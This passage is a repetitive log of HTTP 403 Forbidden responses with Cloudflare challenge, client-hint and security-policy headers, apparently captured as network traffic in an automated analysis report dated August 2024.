accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:09:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:10:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
